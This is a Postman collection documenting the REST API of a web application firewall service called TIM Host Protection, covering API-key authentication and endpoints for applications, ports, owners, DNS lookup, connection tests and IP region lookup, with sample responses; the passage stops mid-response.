{"info":{"_postman_id":"17575dc4-05c8-441f-aa48-a0d9dfeb72d1","name":"TIM Host Protection RESTful API Reference","schema":"https://schema.getpostman.com/json/collection/v2.0.0/collection.json","toc":[],"description":"<html><head></head><body></body></html>","owner":"7501380","collectionId":"17575dc4-05c8-441f-aa48-a0d9dfeb72d1","publishedId":"TW77fiEs","public":true,"customColor":{"top-bar":"FFFFFF","right-sidebar":"303030","highlight":"EF5B25"},"publishDate":"2021-02-10T08:41:31.000Z"},"item":[{"name":"Introduction","item":[],"id":"f96bc667-83fc-41dd-905b-d944fbb7fc03","description":"<h1 id=\"overview\">Overview</h1>\n<p>TIM Host Protection provides an API that uses Representational State Transfer (RESTful API) design principles to access and modify the settings of your TIM Host Protection account. </p>\n<p>The easiest way to get started with the API is to click the Run in Postman button present at the top of the documentation page and use the Postman App to send requests.</p>\n<h1 id=\"rest-principles\">REST principles</h1>\n<p>Programs communicate with the API over HTTPS, the same protocol that your web browser uses to interact securely with web pages.</p>\n<p>The API is based on interactions with a web page. Data is treated like a static web page:</p>\n<ul>\n<li><p>Add data by POSTing a web page</p>\n</li>\n<li><p>Fetch data by GETing a web page</p>\n</li>\n<li><p>Update data by PUTing a web page</p>\n</li>\n<li><p>Delete data by DELETEing a web page</p>\n</li>\n</ul>\n<p>After the TIM Host Protection API receives a request, it returns an HTTP response code. These codes are discussed later in this reference.</p>\n<h1 id=\"access-the-restful-api\">Access the RESTful API</h1>\n<p>You can access the TIM Host Protection API by clicking <strong>Run in Postman</strong> on the top right to download all the APIs to POSTMAN.</p>\n<p>You can make more complicated scripted queries using utilities such as cURL. You can also use scripting languages that have built-in library calls, such as Perl or Python, to interact with the API.</p>\n<h1 id=\"authentication\">Authentication</h1>\n<p>TIM Host Protection RESTful API requires API key authorization. An API Key tells our API server that the request it received came from you. Everything that you have access to in TIM Host Protection is accessible with an API Key that is generated by you. </p>\n<p>For how to generate the API key,  See <a href=\"https://tim.waasonline.com/doc/tim/Content/CloudWAF/settings.htm\">API Key</a> in Online Help.</p>\n<h1 id=\"request-format\">Request format</h1>\n<p>TIM Host Protection RESTful API request is a standard HTTP request, which includes the HTTP header and HTTP body. Expected response can be returned only when the HTTP header and body meet the standard.\nThe HTTP request header of TIM Host Protection RESTful API must include the following header lines:</p>\n<h2 id=\"header-authentication-field\">Header authentication field</h2>\n<p>TIM Host Protection RESTful API requires API key authorization. It is required to add the generated API key from TIM Host Protection GUI in the HTTP request header:\n<code>authentication: Basic</code> <em><code>&lt;api-key-secret&gt;</code></em></p>\n<p>For how to generate the API key,  See <a href=\"https://tim.waasonline.com/doc/tim/Content/CloudWAF/settings.htm\">API Key</a> in Online Help.</p>\n<h2 id=\"accept-field\">Accept field</h2>\n<p>It is required to use Accept field when sending an RESTful API request to show the accepted format. </p>\n<p>The Accept field of most RESTful APIs is: <code>Accept: application/json</code></p>\n<h1 id=\"key-concepts\">Key concepts</h1>\n<p>The following headers are used by APIs documented.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Header name</th>\n<th>Value</th>\n<th>Description</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>Accept</td>\n<td>application/Jason</td>\n<td>Used to specify certain media types which are acceptable by the request; the value of the header should be application/jason, which is not changeable.</td>\n</tr>\n<tr>\n<td>Authorization</td>\n<td>A random string from API Fetch Authorization Token</td>\n<td>Used to specify the token for authorization. The token could be obtained through API Fetch Authorization Token, please see API Fetch Authorization for details.</td>\n</tr>\n<tr>\n<td>Content-Type</td>\n<td>application/json</td>\n<td>Used to specify the content types which are acceptable by the request. The value of the header should be application/jason, which is not changeable.</td>\n</tr>\n</tbody>\n</table>\n</div><h1 id=\"supported-api-methods\">Supported API methods</h1>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Method</th>\n<th>Operation description</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>GET</td>\n<td>Retrieves all configuration information of a resource.</td>\n</tr>\n<tr>\n<td>POST</td>\n<td>Creates new configuration information of a resource.</td>\n</tr>\n<tr>\n<td>PUT</td>\n<td>Updates the specified configuration information of a resource.</td>\n</tr>\n<tr>\n<td>DELETE</td>\n<td>Deletes the specified configuration infomration of a resource.</td>\n</tr>\n<tr>\n<td>OPTIONS</td>\n<td>Previews whether the server accepts the request. Once the preview is successful, the browser will send requests such as GET, PUT, etc.</td>\n</tr>\n</tbody>\n</table>\n</div><h1 id=\"url-format\">URL format</h1>\n<p>The URLs that you use to access TIM Host Protection APIs follow the following format:</p>\n<p><code>https://api.tim.waasonline.com/v1/application/:ep_id/{{module_name}}/</code></p>\n<blockquote>\n<p>{{ }} stands for variable.</p>\n</blockquote>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Variable</th>\n<th>Description</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>{{ep_id}}</td>\n<td>The ID of the apppication. <br />When you click into an application on TIM Host Protection's Web UI, the ID of this application will show in the URL path. It's a 10-digit number. For example, if the URL path is <a href=\"https://tim.waasonline.com/root/1111122222/dashboard\">https://tim.waasonline.com/root/1111122222/dashboard</a>, then 1111122222 is the ep_id.</td>\n</tr>\n<tr>\n<td>{{module_name}}</td>\n<td>Name of the TIM Host Protection module. For example, \"knownattacks\".</td>\n</tr>\n</tbody>\n</table>\n</div>","event":[{"listen":"prerequest","script":{"id":"bcb6db35-85e4-41c6-a46a-73da716c9f85","type":"text/javascript","exec":[""]}},{"listen":"test","script":{"id":"855687c9-ef76-4745-a74d-fb3a04ff6606","type":"text/javascript","exec":[""]}}],"_postman_id":"f96bc667-83fc-41dd-905b-d944fbb7fc03"},{"name":"API reference","item":[{"name":"Basic Application Settings","item":[{"name":"List Applications","id":"d424fdba-f658-4eee-a1e8-82c2fb3bb9d2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application?size={{size}}&filter={{filter}}&forward={{forward}}&cursor={{cursor}}","description":"<p>List all applications that you own and are assigned to you.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>An integer, the page size. The value shall be 10, 20, 30.</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>The values for the variable are [\"app_name\", \"domain_name\", \"block_mode\", \"region\", \"platform\", \"owner\", \"dns_status\",\"data\", \"cost\", \"blocked_req\", \"req\", \"assign_to\",\"template_name\"].</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"},{"description":{"content":"<p>True: the next page;</p>\n<p>False: the previous page.</p>\n","type":"text/plain"},"key":"forward","value":"{{forward}}"},{"description":{"content":"<p>To list the items of the first page, leave the cursor value empty.</p>\n<p>To go forward to next page, get the value of the \"next_cursor\" parameter in the result of the current page, then paste it here as the cursor value.</p>\n<p>To go to the previous page, get the \"prev_cursor\" value, then paste it here as the cursor value.</p>\n","type":"text/plain"},"key":"cursor","value":"{{cursor}}"}],"variable":[]}},"response":[{"id":"92b26cb0-4460-4d7c-bca9-fd96ee7f29a4","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Authorization token","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application?size=10&forward=true&filter=%5B%5D","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"size","value":"10"},{"key":"forward","value":"true"},{"key":"filter","value":"%5B%5D"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:19:46 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c002c3d2-8690-11e9-a9d9-bb3382f61563"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"avcMaHajIAMF59g="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"9c40445c-0593-4038-8010-569596c6ddfc","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application?size=10&forward=true&filter=%5B%5D","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"size","value":"10"},{"key":"forward","value":"true"},{"key":"filter","value":"%5B%5D"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:09:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"278"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"5a9832df-868f-11e9-9924-67b3499856e6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avautHpjIAMFn8w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf60b2a-6a120fd0382ce6900e134fa0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"app_list\": [{\n        \"app_name\": \"app-test1\",\n        \"assign_to\": \"Test Example\",\n        \"assign_to_user_name\": \"test@example.com\",\n        \"block_mode\": 1,\n        \"blocked_req\": 0,\n        \"cdn_status\": 1,\n        \"data\": 0,\n        \"cost\": 0,\n        \"dns_status\": 0,\n        \"domain_name\": \"www1.fwbclouddemo.com\",\n        \"ep_cname\": \"192.22.22.254\",\n        \"ep_id\": \"9746244757\",\n        \"extra_domains\": [],\n        \"platform\": \"AWS\",\n        \"region\": \"CDN\",\n        \"req\": 0,\n        \"template_id\": \"\",\n        \"template_name\": \"\",\n        \"tenant_id\": \"1ecb0a8e-1d56-11ea-a599-0a9068c47440\",\n        \"user_id\": \"a2dfa0ba-cedb-11e9-92f2-0686a6b189d0\",\n        \"user_permission\": \"rw\"\n    }],\n    \"can_add\": 1,\n    \"next_cursor\": \"\",\n    \"prev_cursor\": \"\",\n    \"total\": 1\n}"}],"_postman_id":"d424fdba-f658-4eee-a1e8-82c2fb3bb9d2"},{"name":"Get Predifined Custom Ports","id":"dab9031a-d386-4c07-8a22-56b852f26ef6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application?custom_ports={{custom_ports}}","description":"<p>Get predefined custom ports of certain protocol, which could be \"HTTP\", \"HTTPS\", or \"ALL\".</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The values for the {{custom_ports}} variable are [\"http\", \"https\", \"all\"].</p>\n","type":"text/plain"},"key":"custom_ports","value":"{{custom_ports}}"}],"variable":[]}},"response":[{"id":"0eacd601-4d2a-4f31-bed5-3c1ed41408af","name":"Success of \"HTTPS\"","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application?custom_ports=https","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"custom_ports","value":"https","description":"Get predefined custom ports of HTTPS protocol."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"HTTPS\": [\n        443,\n        7443,\n        8443\n    ]\n}"},{"id":"8cf6c1a7-e185-490c-9409-936ba144e0e4","name":"Success of \"HTTP\"","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application?custom_ports=http","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"custom_ports","value":"http","description":"Get predefined custom ports of HTTP protocol."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:09:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"278"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"5a9832df-868f-11e9-9924-67b3499856e6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avautHpjIAMFn8w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf60b2a-6a120fd0382ce6900e134fa0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"HTTP\": [\n        80,\n        8000,\n        8080,\n        8888\n    ]\n}"},{"id":"9f02f472-2a09-455d-8a87-9b99de967816","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":{"raw":"https://api.tim.waasonline.com/v1/application?custom_ports=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"custom_ports","value":"all"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"cd1c1f51-fffe-444c-8798-1405b31eee1a","name":"Success of \"ALL\"","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application?custom_ports=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"custom_ports","value":"all","description":"Get predefined custom ports of all protocols."}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"HTTP\": [\n        80,\n        8000,\n        8080,\n        8888\n    ],\n    \"HTTPS\": [\n        443,\n        7443,\n        8443\n    ]\n}"}],"_postman_id":"dab9031a-d386-4c07-8a22-56b852f26ef6"},{"name":"List Owners","id":"2289d68f-ed2f-4171-94c7-107c40ebff5c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application/owners","description":"<p>List all owners whom you can create applications for.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application","owners"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"836ae845-ca5b-4022-98bc-bcae6f62ead8","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Authorization token","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/owners"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:09:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"278"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"5a9832df-868f-11e9-9924-67b3499856e6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avautHpjIAMFn8w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf60b2a-6a120fd0382ce6900e134fa0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n\t\"assign_to\": [],\n\t\"owners\": [{\n\t\t\"email_address\":\"test@example.com\",\n\t\t\"is_self\":true,\n\t\t\"total\":\"10\",\n\t\t\"used\":1,\n\t\t\"user_id\":\"fcw_test@example.com\",\n\t\t\"user_name\":\"Test\"\n\t}]\n}"},{"id":"f5dfce90-44c1-4a18-9c0c-0d5dc8f125ac","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Authorization token","type":"text"}],"url":"https://api.tim.waasonline.com/v1/application/owners"},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:19:46 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c002c3d2-8690-11e9-a9d9-bb3382f61563"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"avcMaHajIAMF59g="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"2289d68f-ed2f-4171-94c7-107c40ebff5c"},{"name":"List Applications Basics","id":"606d0621-b373-403c-bdf4-a1d5c0f50747","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"body":{"mode":"raw","raw":""},"url":"https://api.tim.waasonline.com/v1/application?partial={{patiral}}","description":"<p>List all applications with basic info.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Basics marker</p>\n","type":"text/plain"},"key":"partial","value":"{{patiral}}"}],"variable":[]}},"response":[{"id":"213db6a3-69a9-4760-9140-97cbe1064eec","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Authorization token","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application?partial={{patiral}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"partial","value":"{{patiral}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:09:47 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"278"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"5a9832df-868f-11e9-9924-67b3499856e6"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"avautHpjIAMFn8w="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf60b2a-6a120fd0382ce6900e134fa0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"[\n\t{\n\t\t\"ep_id\":\"4641923704\",\n\t\t\"app_name\":\"Test\",\n\t\t\"domain_name\":\"www.timnet.com\"\n\t}\n]"},{"id":"f225cc36-d244-45e4-b02b-2bad40c33a86","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","description":"Authorization token","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application?partial={{patiral}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application"],"query":[{"key":"partial","value":"{{patiral}}"}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 06:19:46 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c002c3d2-8690-11e9-a9d9-bb3382f61563"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"avcMaHajIAMF59g="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"606d0621-b373-403c-bdf4-a1d5c0f50747"},{"name":"Do DNS Lookup","id":"67bad98e-d0b8-4557-af15-baf4036f335f","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"domain\": \"www.example.com\"\n}"},"url":"https://api.tim.waasonline.com/v1/misc/dns-lookup","description":"<p>Check DNS lookup utility. TIM Host Protection parses the protected domain name specified to obtain the IP and CANNE if any.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"domain\"],\n    \"properties\": {\n        \"domain\": {\n        \"description\": \"Website domain name\",\n        \"type\": \"string\",\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","misc","dns-lookup"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"3df785e3-e5f8-4623-8026-1a616716bbbf","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"domain\": \"www.yahoo.com\"\n}"},"url":"https://api.tim.waasonline.com/v1/misc/dns-lookup"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 10 Jun 2019 02:34:09 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"117"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"3972d38d-8b28-11e9-82b3-1f8f7e9fa952"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bCsxKFYmoAMFSZg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cfdc1a1-4708ce7190521719f0b7ec90;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"A\": [\n        \"72.30.35.10\",\n        \"98.138.219.231\",\n        \"98.138.219.232\",\n        \"72.30.35.9\"\n    ],\n    \"CNAME\": [\n        \"atsv2-fp-shed.wg1.b.yahoo.com.\"\n    ]\n}"},{"id":"d6b981ca-77e5-4cc6-a091-361ceb9b15a9","name":"Fail","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"domain\": \"www.not_a_real_website.com\"\n}"},"url":"https://api.tim.waasonline.com/v1/misc/dns-lookup"},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 10 Jun 2019 02:34:58 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"62"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"569db732-8b28-11e9-91a0-154bb11ee13d"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"bCs4zGo4oAMFv-g="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cfdc1d1-18bc5c4010ba1b3d6b001147;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"reason\": \"Failed to look up for www.not_a_real_website.com\"\n}"}],"_postman_id":"67bad98e-d0b8-4557-af15-baf4036f335f"},{"name":"Do Connection Test","id":"f6da8778-7391-40dc-957a-d83cf5749759","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/misc/backend-ip-test?backend_ip={{backend_ip}}&backend_port={{backend_port}}&backend_type={{backend_type}}&domain_name={{protected_domain_name}}","description":"<p>Test whether the web service of a server for the protected domain is available or not.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","misc","backend-ip-test"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>The IP address of the origin server.</p>\n","type":"text/plain"},"key":"backend_ip","value":"{{backend_ip}}"},{"description":{"content":"<p>The TCP port number where the server listens for connections. The number is an integer, and the valid range is from 1 to 65,535.</p>\n","type":"text/plain"},"key":"backend_port","value":"{{backend_port}}"},{"description":{"content":"<p>The IP or Domain which indicates how you want to define the server. The valid values are HTTP and HTTPS.</p>\n","type":"text/plain"},"key":"backend_type","value":"{{backend_type}}"},{"description":{"content":"<p>The fully-qualified domain name (FQDN) of the server.</p>\n","type":"text/plain"},"key":"domain_name","value":"{{protected_domain_name}}"}],"variable":[]}},"response":[{"id":"2d9577c2-ea4b-41a2-98ef-5212b60a73be","name":"Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/misc/backend-ip-test?backend_ip={{backend_ip}}&backend_port={{backend_port}}&backend_type={{backend_type}}&domain_name={{domain_name}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","misc","backend-ip-test"],"query":[{"key":"backend_ip","value":"{{backend_ip}}"},{"key":"backend_port","value":"{{backend_port}}"},{"key":"backend_type","value":"{{backend_type}}"},{"key":"domain_name","value":"{{domain_name}}"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:32:43 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"76"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"b4269e1b-86ab-11e9-9228-33fb836fc210"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"av4dPFXRoAMFvKg="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5cf63abb-5005442afff4d0f0427ff176;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"network_connectivity\": 1,\n    \"head_availability\": 1,\n    \"head_status_code\": 404\n}"},{"id":"f2ef142f-a8a2-43aa-9bb5-9f3e74225ce5","name":"Fail","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/misc/backend-ip-test?backend_ip={{backend_ip}}&backend_port={{backend_port}}&backend_type={{backend_type}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","misc","backend-ip-test"],"query":[{"key":"backend_ip","value":"{{backend_ip}}"},{"key":"backend_port","value":"{{backend_port}}"},{"key":"backend_type","value":"{{backend_type}}"}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 04 Jun 2019 09:33:15 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"38"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"c76f4b69-86ab-11e9-84ee-e7ffba6703bf"},{"key":"x-amz-apigw-id","value":"av4iTHUCoAMFsEg="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"Request parameters error\"\n}"}],"_postman_id":"f6da8778-7391-40dc-957a-d83cf5749759"},{"name":"Fetch IP Region Information","id":"d13e462b-45ac-4e66-b280-8e71287ad821","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"ep_ip\": \"35.172.155.99\"\n\t\"domain_name\":\"www.example.com\",\n\t\"extra_domains\":[\"web1.example.com\",\"web2.example.com\"]\n}"},"url":"https://api.tim.waasonline.com/v1/misc/check-ip-region","description":"<p>Fetch the region of AWS service, geo-location and supported cluster region based on the given web server IP address.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"ep_ip\",\"domain_name\"],\n    \"properties\": {\n        \"ep_ip\": {\n            \"description\": \"Endpoint IPv4 address\",\n            \"type\": \"string\",\n        },\n        \"domain_name\": {\n            \"description\": \"Domain name\",\n            \"type\": \"string\",\n        },\n        \"extra_domains\": {\n            \"description\": \"Extra domains list\",\n            \"type\": \"array\"\n        }\n    }\n}\n</code></pre>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","misc","check-ip-region"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"b3a9ba76-46bc-457a-b697-a1b1fb05f398","name":"Success","originalRequest":{"method":"POST","header":[{"key":"Accept","value":"application/json"},{"key":"Content-Type","value":"application/json"}],"body":{"mode":"raw","raw":"{\n\t\"ep_ip\": \"35.172.155.99\",\n\t\"domain_name\":\"www.example.com\",\n\t\"extra_domains\":[\"web1.example.com\",\"web2.example.com\"],\n    \"custom_port\":{\"http\":80,\"https\":443}\n}"},"url":"https://api.tim.waasonline.com/v1/misc/check-ip-region"},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{   \n    \"region\": [], \n    \"location\": \"United States\", \n    \"cluster\": {\n        \"single\": \"us-east-1\", \n        